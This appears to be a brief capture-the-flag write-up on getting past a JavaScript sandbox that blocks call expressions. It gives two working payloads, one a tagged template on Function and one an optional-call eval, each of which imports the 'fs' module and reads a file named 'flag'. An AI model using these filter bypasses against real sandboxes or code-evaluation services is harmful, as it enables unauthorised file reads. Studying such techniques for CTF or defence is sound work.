There are multiple ways to call a function without using a call expression.
import() is a special syntax that can only be a call expression so it has to be wrapped in Function or eval.
- Tagged template:
Function`import('fs').then(fs => console.log(fs.readFileSync('flag', 'utf8')))```;- Optional call expression:
eval?.("import('fs').then(fs => console.log(fs.readFileSync('flag', 'utf8')))");